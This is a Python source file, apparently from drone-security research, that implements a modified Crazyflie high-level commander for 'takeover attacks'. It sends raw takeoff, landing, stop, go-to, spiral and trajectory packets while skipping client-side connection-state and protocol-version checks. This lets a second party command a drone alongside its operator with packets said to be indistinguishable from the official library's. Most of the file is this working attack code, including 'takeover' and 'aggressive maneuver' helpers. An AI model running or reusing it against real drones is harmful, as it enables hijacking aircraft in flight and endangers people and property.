#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Modified HighLevelCommander for takeover attacks.

Standalone version that operates at the client layer only.
No firmware modifications are introduced. Packets are indistinguishable
from those generated by the official library.
"""
import struct
import logging
from cflib.crtp.crtpstack import CRTPPacket, CRTPPort

logger = logging.getLogger(__name__)


class ModifiedHighLevelCommander:
    """
    Modified HighLevelCommander that demonstrates parallel control.

    This commander bypasses client-side state checks and protocol version
    negotiations that assume single-controller operation. From the drone's
    perspective, packets are identical to those from the official library.
    """

    # Command constants (same as official library)
    CMD_SET_GROUP_MASK = 0
    CMD_STOP = 3
    CMD_GO_TO = 4
    CMD_START_TRAJECTORY = 5
    CMD_DEFINE_TRAJECTORY = 6
    CMD_TAKEOFF = 7
    CMD_LAND = 8
    CMD_SPIRAL = 11
    CMD_GO_TO_2 = 12
    CMD_START_TRAJECTORY_2 = 13

    ALL_GROUPS = 0
    TRAJECTORY_LOCATION_MEM = 1
    TRAJECTORY_TYPE_POLY4D = 0
    TRAJECTORY_TYPE_POLY4D_COMPRESSED = 1

    def __init__(self, crazyflie):
        """
        Initialize the modified commander with direct Crazyflie access.

        Args:
            crazyflie: Crazyflie instance (not SyncCrazyflie)
        """
        self._cf = crazyflie
        logger.info("ModifiedHighLevelCommander initialized")

    def _send_packet(self, data):
        """
        Send raw CRTP packet without client-side validation.

        This bypasses connection state checks (Assumption 3) and
        protocol version negotiations (Assumption 5).

        Args:
            data: Packed command data

        Returns:
            True if send succeeded, False otherwise
        """
        pk = CRTPPacket()
        pk.port = CRTPPort.SETPOINT_HL
        pk.data = data
        try:
            self._cf.send_packet(pk)
            return True
        except Exception as e:
            logger.error(f"Packet send failed: {e}")
            return False

    def set_group_mask(self, group_mask=ALL_GROUPS):
        """Set group mask for this commander."""
        return self._send_packet(struct.pack('<BB',
                                             self.CMD_SET_GROUP_MASK,
                                             group_mask))

    def takeoff(self, height, duration, group_mask=ALL_GROUPS, yaw=0.0):
        """
        Takeoff command.

        Uses same packet format as official library (Assumption 5).
        No client-side state checks are performed (Assumption 3).

        Args:
            height: Target height in meters
            duration: Time to reach target height in seconds
            group_mask: Mask for which CFs this applies to
            yaw: Target yaw in radians
        """
        target_yaw = yaw if yaw is not None else 0.0
        use_current_yaw = yaw is None

        return self._send_packet(struct.pack('<BBff?f',
                                            self.CMD_TAKEOFF,
                                            group_mask,
                                            height,
                                            target_yaw,
                                            use_current_yaw,
                                            duration))

    def land(self, height, duration, group_mask=ALL_GROUPS, yaw=0.0):
        """
        Land command.

        Uses same packet format as official library.
        No client-side state checks are performed.

        Args:
            height: Target height in meters (0 for landing)
            duration: Time to reach target height in seconds
            group_mask: Mask for which CFs this applies to
            yaw: Target yaw in radians
        """
        target_yaw = yaw if yaw is not None else 0.0
        use_current_yaw = yaw is None

        return self._send_packet(struct.pack('<BBff?f',
                                            self.CMD_LAND,
                                            group_mask,
                                            height,
                                            target_yaw,
                                            use_current_yaw,
                                            duration))

    def emergency_stop(self, group_mask=ALL_GROUPS):
        """Emergency stop command."""
        return self._send_packet(struct.pack('<BB',
                                            self.CMD_STOP,
                                            group_mask))

    def go_to(self, x, y, z, yaw, duration, relative=False, linear=False,
              group_mask=ALL_GROUPS):
        """
        Position command.

        Always uses newer protocol format, bypassing version checks
        (Assumption 5).

        Args:
            x: Target X position in meters
            y: Target Y position in meters
            z: Target Z position in meters
            yaw: Target yaw in radians
            duration: Time to reach target in seconds
            relative: True if position is relative to current
            linear: True for linear interpolation
            group_mask: Mask for which CFs this applies to
        """
        return self._send_packet(struct.pack('<BBBBfffff',
                                            self.CMD_GO_TO_2,
                                            group_mask,
                                            relative,
                                            linear,
                                            x, y, z,
                                            yaw,
                                            duration))

    def spiral(self, angle, r0, rF, ascent, duration, sideways=False,
               clockwise=False, group_mask=ALL_GROUPS):
        """Spiral command (bypasses parameter validation)."""
        return self._send_packet(struct.pack('<BBBBfffff',
                                            self.CMD_SPIRAL,
                                            group_mask,
                                            sideways,
                                            clockwise,
                                            angle,
                                            r0, rF,
                                            ascent,
                                            duration))

    def start_trajectory(self, trajectory_id, time_scale=1.0,
                         relative_position=False, relative_yaw=False,
                         reversed=False, group_mask=ALL_GROUPS):
        """Start trajectory execution (uses newer protocol format)."""
        return self._send_packet(struct.pack('<BBBBBBf',
                                            self.CMD_START_TRAJECTORY_2,
                                            group_mask,
                                            relative_position,
                                            relative_yaw,
                                            reversed,
                                            trajectory_id,
                                            time_scale))

    def define_trajectory(self, trajectory_id, offset, n_pieces,
                          trajectory_type=TRAJECTORY_TYPE_POLY4D):
        """Define trajectory in memory."""
        return self._send_packet(struct.pack('<BBBBIB',
                                            self.CMD_DEFINE_TRAJECTORY,
                                            trajectory_id,
                                            self.TRAJECTORY_LOCATION_MEM,
                                            trajectory_type,
                                            offset,
                                            n_pieces))

    # Convenience methods for takeover scenarios

    def takeover_takeoff(self, height=1.0, duration=2.0):
        """Takeoff for takeover scenarios."""
        return self.takeoff(height, duration)

    def emergency_land(self, duration=3.0):
        """Emergency landing."""
        return self.land(0.0, duration)

    def aggressive_maneuver(self, x, y, z, yaw, duration=1.0):
        """Maneuver with minimal duration."""
        return self.go_to(x, y, z, yaw, max(0.1, duration))
